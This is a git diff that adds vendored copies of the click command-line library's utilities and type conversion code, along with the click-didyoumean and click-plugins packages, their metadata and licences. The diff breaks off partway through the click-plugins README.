using a Python tuple literal as a type. + + :param types: a list of types that should be used for the tuple items. 
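
    A hypothetical option using a tuple literal (illustrative)::

        @click.option("--item", type=(str, int))

    accepts ``--item peanuts 42`` and passes ``("peanuts", 42)`` to the
    command.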
+ """ + + def __init__(self, types: t.Sequence[t.Union[t.Type[t.Any], ParamType]]) -> None: + self.types: t.Sequence[ParamType] = [convert_type(ty) for ty in types] + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["types"] = [t.to_info_dict() for t in self.types] + return info_dict + + @property + def name(self) -> str: # type: ignore + return f"<{' '.join(ty.name for ty in self.types)}>" + + @property + def arity(self) -> int: # type: ignore + return len(self.types) + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + len_type = len(self.types) + len_value = len(value) + + if len_value != len_type: + self.fail( + ngettext( + "{len_type} values are required, but {len_value} was given.", + "{len_type} values are required, but {len_value} were given.", + len_value, + ).format(len_type=len_type, len_value=len_value), + param=param, + ctx=ctx, + ) + + return tuple(ty(x, param, ctx) for ty, x in zip(self.types, value)) + + +def convert_type(ty: t.Optional[t.Any], default: t.Optional[t.Any] = None) -> ParamType: + """Find the most appropriate :class:`ParamType` for the given Python + type. If the type isn't provided, it can be inferred from a default + value. + """ + guessed_type = False + + if ty is None and default is not None: + if isinstance(default, (tuple, list)): + # If the default is empty, ty will remain None and will + # return STRING. + if default: + item = default[0] + + # A tuple of tuples needs to detect the inner types. + # Can't call convert recursively because that would + # incorrectly unwind the tuple to a single type. + if isinstance(item, (tuple, list)): + ty = tuple(map(type, item)) + else: + ty = type(item) + else: + ty = type(default) + + guessed_type = True + + if isinstance(ty, tuple): + return Tuple(ty) + + if isinstance(ty, ParamType): + return ty + + if ty is str or ty is None: + return STRING + + if ty is int: + return INT + + if ty is float: + return FLOAT + + if ty is bool: + return BOOL + + if guessed_type: + return STRING + + if __debug__: + try: + if issubclass(ty, ParamType): + raise AssertionError( + f"Attempted to use an uninstantiated parameter type ({ty})." + ) + except TypeError: + # ty is an instance (correct), so issubclass fails. + pass + + return FuncParamType(ty) + + +#: A dummy parameter type that just does nothing. From a user's +#: perspective this appears to just be the same as `STRING` but +#: internally no string conversion takes place if the input was bytes. +#: This is usually useful when working with file paths as they can +#: appear in bytes and unicode. +#: +#: For path related uses the :class:`Path` type is a better choice but +#: there are situations where an unprocessed type is useful which is why +#: it is is provided. +#: +#: .. versionadded:: 4.0 +UNPROCESSED = UnprocessedParamType() + +#: A unicode string parameter type which is the implicit default. This +#: can also be selected by using ``str`` as type. +STRING = StringParamType() + +#: An integer parameter. This can also be selected by using ``int`` as +#: type. +INT = IntParamType() + +#: A floating point value parameter. This can also be selected by using +#: ``float`` as type. +FLOAT = FloatParamType() + +#: A boolean parameter. This is the default for boolean flags. This can +#: also be selected by using ``bool`` as a type. +BOOL = BoolParamType() + +#: A UUID parameter. 
+UUID = UUIDParameterType() diff --git a/env/Lib/site-packages/click/utils.py b/env/Lib/site-packages/click/utils.py new file mode 100644 index 00000000..d536434f --- /dev/null +++ b/env/Lib/site-packages/click/utils.py @@ -0,0 +1,624 @@ +import os +import re +import sys +import typing as t +from functools import update_wrapper +from types import ModuleType +from types import TracebackType + +from ._compat import _default_text_stderr +from ._compat import _default_text_stdout +from ._compat import _find_binary_writer +from ._compat import auto_wrap_for_ansi +from ._compat import binary_streams +from ._compat import open_stream +from ._compat import should_strip_ansi +from ._compat import strip_ansi +from ._compat import text_streams +from ._compat import WIN +from .globals import resolve_color_default + +if t.TYPE_CHECKING: + import typing_extensions as te + + P = te.ParamSpec("P") + +R = t.TypeVar("R") + + +def _posixify(name: str) -> str: + return "-".join(name.split()).lower() + + +def safecall(func: "t.Callable[P, R]") -> "t.Callable[P, t.Optional[R]]": + """Wraps a function so that it swallows exceptions.""" + + def wrapper(*args: "P.args", **kwargs: "P.kwargs") -> t.Optional[R]: + try: + return func(*args, **kwargs) + except Exception: + pass + return None + + return update_wrapper(wrapper, func) + + +def make_str(value: t.Any) -> str: + """Converts a value into a valid string.""" + if isinstance(value, bytes): + try: + return value.decode(sys.getfilesystemencoding()) + except UnicodeError: + return value.decode("utf-8", "replace") + return str(value) + + +def make_default_short_help(help: str, max_length: int = 45) -> str: + """Returns a condensed version of help string.""" + # Consider only the first paragraph. + paragraph_end = help.find("\n\n") + + if paragraph_end != -1: + help = help[:paragraph_end] + + # Collapse newlines, tabs, and spaces. + words = help.split() + + if not words: + return "" + + # The first paragraph started with a "no rewrap" marker, ignore it. + if words[0] == "\b": + words = words[1:] + + total_length = 0 + last_index = len(words) - 1 + + for i, word in enumerate(words): + total_length += len(word) + (i > 0) + + if total_length > max_length: # too long, truncate + break + + if word[-1] == ".": # sentence end, truncate without "..." + return " ".join(words[: i + 1]) + + if total_length == max_length and i != last_index: + break # not at sentence end, truncate with "..." + else: + return " ".join(words) # no truncation needed + + # Account for the length of the suffix. + total_length += len("...") + + # remove words until the length is short enough + while i > 0: + total_length -= len(words[i]) + (i > 0) + + if total_length <= max_length: + break + + i -= 1 + + return " ".join(words[:i]) + "..." + + +class LazyFile: + """A lazy file works like a regular file but it does not fully open + the file but it does perform some basic checks early to see if the + filename parameter does make sense. This is useful for safely opening + files for writing. 
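
    Illustrative use (hypothetical)::

        lf = LazyFile("report.txt", "w")
        with lf:
            lf.write("data")  # opened only on first access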
+ """ + + def __init__( + self, + filename: t.Union[str, "os.PathLike[str]"], + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + atomic: bool = False, + ): + self.name: str = os.fspath(filename) + self.mode = mode + self.encoding = encoding + self.errors = errors + self.atomic = atomic + self._f: t.Optional[t.IO[t.Any]] + self.should_close: bool + + if self.name == "-": + self._f, self.should_close = open_stream(filename, mode, encoding, errors) + else: + if "r" in mode: + # Open and close the file in case we're opening it for + # reading so that we can catch at least some errors in + # some cases early. + open(filename, mode).close() + self._f = None + self.should_close = True + + def __getattr__(self, name: str) -> t.Any: + return getattr(self.open(), name) + + def __repr__(self) -> str: + if self._f is not None: + return repr(self._f) + return f"" + + def open(self) -> t.IO[t.Any]: + """Opens the file if it's not yet open. This call might fail with + a :exc:`FileError`. Not handling this error will produce an error + that Click shows. + """ + if self._f is not None: + return self._f + try: + rv, self.should_close = open_stream( + self.name, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + except OSError as e: # noqa: E402 + from .exceptions import FileError + + raise FileError(self.name, hint=e.strerror) from e + self._f = rv + return rv + + def close(self) -> None: + """Closes the underlying file, no matter what.""" + if self._f is not None: + self._f.close() + + def close_intelligently(self) -> None: + """This function only closes the file if it was opened by the lazy + file wrapper. For instance this will never close stdin. + """ + if self.should_close: + self.close() + + def __enter__(self) -> "LazyFile": + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self.close_intelligently() + + def __iter__(self) -> t.Iterator[t.AnyStr]: + self.open() + return iter(self._f) # type: ignore + + +class KeepOpenFile: + def __init__(self, file: t.IO[t.Any]) -> None: + self._file: t.IO[t.Any] = file + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._file, name) + + def __enter__(self) -> "KeepOpenFile": + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + pass + + def __repr__(self) -> str: + return repr(self._file) + + def __iter__(self) -> t.Iterator[t.AnyStr]: + return iter(self._file) + + +def echo( + message: t.Optional[t.Any] = None, + file: t.Optional[t.IO[t.Any]] = None, + nl: bool = True, + err: bool = False, + color: t.Optional[bool] = None, +) -> None: + """Print a message and newline to stdout or a file. This should be + used instead of :func:`print` because it provides better support + for different data, files, and environments. + + Compared to :func:`print`, this does the following: + + - Ensures that the output encoding is not misconfigured on Linux. + - Supports Unicode in the Windows console. + - Supports writing to binary outputs, and supports writing bytes + to text outputs. + - Supports colors and styles on Windows. + - Removes ANSI color and style codes if the output does not look + like an interactive terminal. + - Always flushes the output. + + :param message: The string or bytes to output. Other objects are + converted to strings. 
+ :param file: The file to write to. Defaults to ``stdout``. + :param err: Write to ``stderr`` instead of ``stdout``. + :param nl: Print a newline after the message. Enabled by default. + :param color: Force showing or hiding colors and other styles. By + default Click will remove color if the output does not look like + an interactive terminal. + + .. versionchanged:: 6.0 + Support Unicode output on the Windows console. Click does not + modify ``sys.stdout``, so ``sys.stdout.write()`` and ``print()`` + will still not support Unicode. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. + + .. versionadded:: 3.0 + Added the ``err`` parameter. + + .. versionchanged:: 2.0 + Support colors on Windows if colorama is installed. + """ + if file is None: + if err: + file = _default_text_stderr() + else: + file = _default_text_stdout() + + # There are no standard streams attached to write to. For example, + # pythonw on Windows. + if file is None: + return + + # Convert non bytes/text into the native string type. + if message is not None and not isinstance(message, (str, bytes, bytearray)): + out: t.Optional[t.Union[str, bytes]] = str(message) + else: + out = message + + if nl: + out = out or "" + if isinstance(out, str): + out += "\n" + else: + out += b"\n" + + if not out: + file.flush() + return + + # If there is a message and the value looks like bytes, we manually + # need to find the binary stream and write the message in there. + # This is done separately so that most stream types will work as you + # would expect. Eg: you can write to StringIO for other cases. + if isinstance(out, (bytes, bytearray)): + binary_file = _find_binary_writer(file) + + if binary_file is not None: + file.flush() + binary_file.write(out) + binary_file.flush() + return + + # ANSI style code support. For no message or bytes, nothing happens. + # When outputting to a file instead of a terminal, strip codes. + else: + color = resolve_color_default(color) + + if should_strip_ansi(file, color): + out = strip_ansi(out) + elif WIN: + if auto_wrap_for_ansi is not None: + file = auto_wrap_for_ansi(file) # type: ignore + elif not color: + out = strip_ansi(out) + + file.write(out) # type: ignore + file.flush() + + +def get_binary_stream(name: "te.Literal['stdin', 'stdout', 'stderr']") -> t.BinaryIO: + """Returns a system stream for byte processing. + + :param name: the name of the stream to open. Valid names are ``'stdin'``, + ``'stdout'`` and ``'stderr'`` + """ + opener = binary_streams.get(name) + if opener is None: + raise TypeError(f"Unknown standard stream '{name}'") + return opener() + + +def get_text_stream( + name: "te.Literal['stdin', 'stdout', 'stderr']", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", +) -> t.TextIO: + """Returns a system stream for text processing. This usually returns + a wrapped stream around a binary stream returned from + :func:`get_binary_stream` but it also can take shortcuts for already + correctly configured streams. + + :param name: the name of the stream to open. Valid names are ``'stdin'``, + ``'stdout'`` and ``'stderr'`` + :param encoding: overrides the detected default encoding. + :param errors: overrides the default error mode. 
+ """ + opener = text_streams.get(name) + if opener is None: + raise TypeError(f"Unknown standard stream '{name}'") + return opener(encoding, errors) + + +def open_file( + filename: str, + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + lazy: bool = False, + atomic: bool = False, +) -> t.IO[t.Any]: + """Open a file, with extra behavior to handle ``'-'`` to indicate + a standard stream, lazy open on write, and atomic write. Similar to + the behavior of the :class:`~click.File` param type. + + If ``'-'`` is given to open ``stdout`` or ``stdin``, the stream is + wrapped so that using it in a context manager will not close it. + This makes it possible to use the function without accidentally + closing a standard stream: + + .. code-block:: python + + with open_file(filename) as f: + ... + + :param filename: The name of the file to open, or ``'-'`` for + ``stdin``/``stdout``. + :param mode: The mode in which to open the file. + :param encoding: The encoding to decode or encode a file opened in + text mode. + :param errors: The error handling mode. + :param lazy: Wait to open the file until it is accessed. For read + mode, the file is temporarily opened to raise access errors + early, then closed until it is read again. + :param atomic: Write to a temporary file and replace the given file + on close. + + .. versionadded:: 3.0 + """ + if lazy: + return t.cast( + t.IO[t.Any], LazyFile(filename, mode, encoding, errors, atomic=atomic) + ) + + f, should_close = open_stream(filename, mode, encoding, errors, atomic=atomic) + + if not should_close: + f = t.cast(t.IO[t.Any], KeepOpenFile(f)) + + return f + + +def format_filename( + filename: "t.Union[str, bytes, os.PathLike[str], os.PathLike[bytes]]", + shorten: bool = False, +) -> str: + """Format a filename as a string for display. Ensures the filename can be + displayed by replacing any invalid bytes or surrogate escapes in the name + with the replacement character ``�``. + + Invalid bytes or surrogate escapes will raise an error when written to a + stream with ``errors="strict". This will typically happen with ``stdout`` + when the locale is something like ``en_GB.UTF-8``. + + Many scenarios *are* safe to write surrogates though, due to PEP 538 and + PEP 540, including: + + - Writing to ``stderr``, which uses ``errors="backslashreplace"``. + - The system has ``LANG=C.UTF-8``, ``C``, or ``POSIX``. Python opens + stdout and stderr with ``errors="surrogateescape"``. + - None of ``LANG/LC_*`` are set. Python assumes ``LANG=C.UTF-8``. + - Python is started in UTF-8 mode with ``PYTHONUTF8=1`` or ``-X utf8``. + Python opens stdout and stderr with ``errors="surrogateescape"``. + + :param filename: formats a filename for UI display. This will also convert + the filename into unicode without failing. + :param shorten: this optionally shortens the filename to strip of the + path that leads up to it. + """ + if shorten: + filename = os.path.basename(filename) + else: + filename = os.fspath(filename) + + if isinstance(filename, bytes): + filename = filename.decode(sys.getfilesystemencoding(), "replace") + else: + filename = filename.encode("utf-8", "surrogateescape").decode( + "utf-8", "replace" + ) + + return filename + + +def get_app_dir(app_name: str, roaming: bool = True, force_posix: bool = False) -> str: + r"""Returns the config folder for the application. The default behavior + is to return whatever is most appropriate for the operating system. 
+ + To give you an idea, for an app called ``"Foo Bar"``, something like + the following folders could be returned: + + Mac OS X: + ``~/Library/Application Support/Foo Bar`` + Mac OS X (POSIX): + ``~/.foo-bar`` + Unix: + ``~/.config/foo-bar`` + Unix (POSIX): + ``~/.foo-bar`` + Windows (roaming): + ``C:\Users\\AppData\Roaming\Foo Bar`` + Windows (not roaming): + ``C:\Users\\AppData\Local\Foo Bar`` + + .. versionadded:: 2.0 + + :param app_name: the application name. This should be properly capitalized + and can contain whitespace. + :param roaming: controls if the folder should be roaming or not on Windows. + Has no effect otherwise. + :param force_posix: if this is set to `True` then on any POSIX system the + folder will be stored in the home folder with a leading + dot instead of the XDG config home or darwin's + application support folder. + """ + if WIN: + key = "APPDATA" if roaming else "LOCALAPPDATA" + folder = os.environ.get(key) + if folder is None: + folder = os.path.expanduser("~") + return os.path.join(folder, app_name) + if force_posix: + return os.path.join(os.path.expanduser(f"~/.{_posixify(app_name)}")) + if sys.platform == "darwin": + return os.path.join( + os.path.expanduser("~/Library/Application Support"), app_name + ) + return os.path.join( + os.environ.get("XDG_CONFIG_HOME", os.path.expanduser("~/.config")), + _posixify(app_name), + ) + + +class PacifyFlushWrapper: + """This wrapper is used to catch and suppress BrokenPipeErrors resulting + from ``.flush()`` being called on broken pipe during the shutdown/final-GC + of the Python interpreter. Notably ``.flush()`` is always called on + ``sys.stdout`` and ``sys.stderr``. So as to have minimal impact on any + other cleanup code, and the case where the underlying file is not a broken + pipe, all calls and attributes are proxied. + """ + + def __init__(self, wrapped: t.IO[t.Any]) -> None: + self.wrapped = wrapped + + def flush(self) -> None: + try: + self.wrapped.flush() + except OSError as e: + import errno + + if e.errno != errno.EPIPE: + raise + + def __getattr__(self, attr: str) -> t.Any: + return getattr(self.wrapped, attr) + + +def _detect_program_name( + path: t.Optional[str] = None, _main: t.Optional[ModuleType] = None +) -> str: + """Determine the command used to run the program, for use in help + text. If a file or entry point was executed, the file name is + returned. If ``python -m`` was used to execute a module or package, + ``python -m name`` is returned. + + This doesn't try to be too precise, the goal is to give a concise + name for help text. Files are only shown as their name without the + path. ``python`` is only shown for modules, and the full path to + ``sys.executable`` is not shown. + + :param path: The Python file being executed. Python puts this in + ``sys.argv[0]``, which is used by default. + :param _main: The ``__main__`` module. This should only be passed + during internal testing. + + .. versionadded:: 8.0 + Based on command args detection in the Werkzeug reloader. + + :meta private: + """ + if _main is None: + _main = sys.modules["__main__"] + + if not path: + path = sys.argv[0] + + # The value of __package__ indicates how Python was called. It may + # not exist if a setuptools script is installed as an egg. It may be + # set incorrectly for entry points created with pip on Windows. + # It is set to "" inside a Shiv or PEX zipapp. 
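    # For example (illustrative): "python app.py" returns "app.py", while
    # "python -m example" returns "python -m example".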
+ if getattr(_main, "__package__", None) in {None, ""} or ( + os.name == "nt" + and _main.__package__ == "" + and not os.path.exists(path) + and os.path.exists(f"{path}.exe") + ): + # Executed a file, like "python app.py". + return os.path.basename(path) + + # Executed a module, like "python -m example". + # Rewritten by Python from "-m script" to "/path/to/script.py". + # Need to look at main module to determine how it was executed. + py_module = t.cast(str, _main.__package__) + name = os.path.splitext(os.path.basename(path))[0] + + # A submodule like "example.cli". + if name != "__main__": + py_module = f"{py_module}.{name}" + + return f"python -m {py_module.lstrip('.')}" + + +def _expand_args( + args: t.Iterable[str], + *, + user: bool = True, + env: bool = True, + glob_recursive: bool = True, +) -> t.List[str]: + """Simulate Unix shell expansion with Python functions. + + See :func:`glob.glob`, :func:`os.path.expanduser`, and + :func:`os.path.expandvars`. + + This is intended for use on Windows, where the shell does not do any + expansion. It may not exactly match what a Unix shell would do. + + :param args: List of command line arguments to expand. + :param user: Expand user home directory. + :param env: Expand environment variables. + :param glob_recursive: ``**`` matches directories recursively. + + .. versionchanged:: 8.1 + Invalid glob patterns are treated as empty expansions rather + than raising an error. + + .. versionadded:: 8.0 + + :meta private: + """ + from glob import glob + + out = [] + + for arg in args: + if user: + arg = os.path.expanduser(arg) + + if env: + arg = os.path.expandvars(arg) + + try: + matches = glob(arg, recursive=glob_recursive) + except re.error: + matches = [] + + if not matches: + out.append(arg) + else: + out.extend(matches) + + return out diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE new file mode 100644 index 00000000..77fff8cd --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/LICENSE @@ -0,0 +1,19 @@ +Copyright (c) 2016 Timo Furrer + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. 
diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA new file mode 100644 index 00000000..6d84ea51 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/METADATA @@ -0,0 +1,14 @@ +Metadata-Version: 2.1 +Name: click-didyoumean +Version: 0.3.0 +Summary: Enables git-like *did-you-mean* feature in click +License: MIT +Author: Timo Furrer +Author-email: timo.furrer@roche.com +Requires-Python: >=3.6.2,<4.0.0 +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Requires-Dist: click (>=7) diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD new file mode 100644 index 00000000..8c149456 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/RECORD @@ -0,0 +1,7 @@ +click_didyoumean-0.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_didyoumean-0.3.0.dist-info/LICENSE,sha256=78dPJV3W_UKJNjsb_nHNDtcLKSbIJY1hUiBOaokEHAo,1056 +click_didyoumean-0.3.0.dist-info/METADATA,sha256=Z14H3koQ6o-7SZV92h932lmyOI7wVlQJz4z2a0-8x30,495 +click_didyoumean-0.3.0.dist-info/RECORD,, +click_didyoumean-0.3.0.dist-info/WHEEL,sha256=DRf8A_Psd1SF2kVqTQOOFU1Xzl3-A2qljAxBMTOusUs,83 +click_didyoumean/__init__.py,sha256=ZdVAFTqOmOQOcKAn8ew4Knr8tYXSDwQyEzc7az-gd08,2054 +click_didyoumean/__pycache__/__init__.cpython-310.pyc,, diff --git a/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL new file mode 100644 index 00000000..d131b796 --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean-0.3.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: poetry 1.0.6 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/click_didyoumean/__init__.py b/env/Lib/site-packages/click_didyoumean/__init__.py new file mode 100644 index 00000000..15e01cbb --- /dev/null +++ b/env/Lib/site-packages/click_didyoumean/__init__.py @@ -0,0 +1,66 @@ +""" +Extension for ``click`` to provide a group +with a git-like *did-you-mean* feature. +""" + +import difflib +import typing + +import click + + +class DYMMixin: + """ + Mixin class for click MultiCommand inherited classes + to provide git-like *did-you-mean* functionality when + a certain command is not registered. + """ + + def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None: + self.max_suggestions = kwargs.pop("max_suggestions", 3) + self.cutoff = kwargs.pop("cutoff", 0.5) + super().__init__(*args, **kwargs) # type: ignore + + def resolve_command( + self, ctx: click.Context, args: typing.List[str] + ) -> typing.Tuple[ + typing.Optional[str], typing.Optional[click.Command], typing.List[str] + ]: + """ + Overrides clicks ``resolve_command`` method + and appends *Did you mean ...* suggestions + to the raised exception message. 
+ """ + try: + return super(DYMMixin, self).resolve_command(ctx, args) # type: ignore + except click.exceptions.UsageError as error: + error_msg = str(error) + original_cmd_name = click.utils.make_str(args[0]) + matches = difflib.get_close_matches( + original_cmd_name, + self.list_commands(ctx), # type: ignore + self.max_suggestions, + self.cutoff, + ) + if matches: + fmt_matches = "\n ".join(matches) + error_msg += "\n\n" + error_msg += f"Did you mean one of these?\n {fmt_matches}" + + raise click.exceptions.UsageError(error_msg, error.ctx) + + +class DYMGroup(DYMMixin, click.Group): + """ + click Group to provide git-like + *did-you-mean* functionality when a certain + command is not found in the group. + """ + + +class DYMCommandCollection(DYMMixin, click.CommandCollection): + """ + click CommandCollection to provide git-like + *did-you-mean* functionality when a certain + command is not found in the group. + """ diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt new file mode 100644 index 00000000..17b68caa --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/AUTHORS.txt @@ -0,0 +1,5 @@ +Authors +======= + +Kevin Wurster +Sean Gillies diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt new file mode 100644 index 00000000..8fbd3537 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/LICENSE.txt @@ -0,0 +1,29 @@ +New BSD License + +Copyright (c) 2015-2019, Kevin D. Wurster, Sean C. Gillies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither click-plugins nor the names of its contributors may not be used to + endorse or promote products derived from this software without specific prior + written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
\ No newline at end of file diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA new file mode 100644 index 00000000..11df8ed8 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/METADATA @@ -0,0 +1,210 @@ +Metadata-Version: 2.1 +Name: click-plugins +Version: 1.1.1 +Summary: An extension module for click to enable registering CLI commands via setuptools entry-points. +Home-page: https://github.com/click-contrib/click-plugins +Author: Kevin Wurster, Sean Gillies +Author-email: wursterk@gmail.com, sean.gillies@gmail.com +License: New BSD +Keywords: click plugin setuptools entry-point +Platform: UNKNOWN +Classifier: Topic :: Utilities +Classifier: Intended Audience :: Developers +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Requires-Dist: click (>=4.0) +Provides-Extra: dev +Requires-Dist: pytest (>=3.6) ; extra == 'dev' +Requires-Dist: pytest-cov ; extra == 'dev' +Requires-Dist: wheel ; extra == 'dev' +Requires-Dist: coveralls ; extra == 'dev' + +============= +click-plugins +============= + +.. image:: https://travis-ci.org/click-contrib/click-plugins.svg?branch=master + :target: https://travis-ci.org/click-contrib/click-plugins?branch=master + +.. image:: https://coveralls.io/repos/click-contrib/click-plugins/badge.svg?branch=master&service=github + :target: https://coveralls.io/github/click-contrib/click-plugins?branch=master + +An extension module for `click `_ to register +external CLI commands via setuptools entry-points. + + +Why? +---- + +Lets say you develop a commandline interface and someone requests a new feature +that is absolutely related to your project but would have negative consequences +like additional dependencies, major refactoring, or maybe its just too domain +specific to be supported directly. Rather than developing a separate standalone +utility you could offer up a `setuptools entry point `_ +that allows others to use your commandline utility as a home for their related +sub-commands. You get to choose where these sub-commands or sub-groups CAN be +registered but the plugin developer gets to choose they ARE registered. You +could have all plugins register alongside the core commands, in a special +sub-group, across multiple sub-groups, or some combination. + + +Enabling Plugins +---------------- + +For a more detailed example see the `examples `_ section. + +The only requirement is decorating ``click.group()`` with ``click_plugins.with_plugins()`` +which handles attaching external commands and groups. In this case the core CLI developer +registers CLI plugins from ``core_package.cli_plugins``. + +.. code-block:: python + + from pkg_resources import iter_entry_points + + import click + from click_plugins import with_plugins + + + @with_plugins(iter_entry_points('core_package.cli_plugins')) + @click.group() + def cli(): + """Commandline interface for yourpackage.""" + + @cli.command() + def subcommand(): + """Subcommand that does something.""" + + +Developing Plugins +------------------ + +Plugin developers need to register their sub-commands or sub-groups to an +entry-point in their ``setup.py`` that is loaded by the core package. + +.. 
code-block:: python + + from setuptools import setup + + setup( + name='yourscript', + version='0.1', + py_modules=['yourscript'], + install_requires=[ + 'click', + ], + entry_points=''' + [core_package.cli_plugins] + cool_subcommand=yourscript.cli:cool_subcommand + another_subcommand=yourscript.cli:another_subcommand + ''', + ) + + +Broken and Incompatible Plugins +------------------------------- + +Any sub-command or sub-group that cannot be loaded is caught and converted to +a ``click_plugins.core.BrokenCommand()`` rather than just crashing the entire +CLI. The short-help is converted to a warning message like: + +.. code-block:: console + + Warning: could not load plugin. See `` --help``. + +and if the sub-command or group is executed the entire traceback is printed. + + +Best Practices and Extra Credit +------------------------------- + +Opening a CLI to plugins encourages other developers to independently extend +functionality independently but there is no guarantee these new features will +be "on brand". Plugin developers are almost certainly already using features +in the core package the CLI belongs to so defining commonly used arguments and +options in one place lets plugin developers reuse these flags to produce a more +cohesive CLI. If the CLI is simple maybe just define them at the top of +``yourpackage/cli.py`` or for more complex packages something like +``yourpackage/cli/options.py``. These common options need to be easy to find +and be well documented so that plugin developers know what variable to give to +their sub-command's function and what object they can expect to receive. Don't +forget to document non-obvious callbacks. + +Keep in mind that plugin developers also have access to the parent group's +``ctx.obj``, which is very useful for passing things like verbosity levels or +config values around to sub-commands. + +Here's some code that sub-commands could re-use: + +.. code-block:: python + + from multiprocessing import cpu_count + + import click + + jobs_opt = click.option( + '-j', '--jobs', metavar='CORES', type=click.IntRange(min=1, max=cpu_count()), default=1, + show_default=True, help="Process data across N cores." + 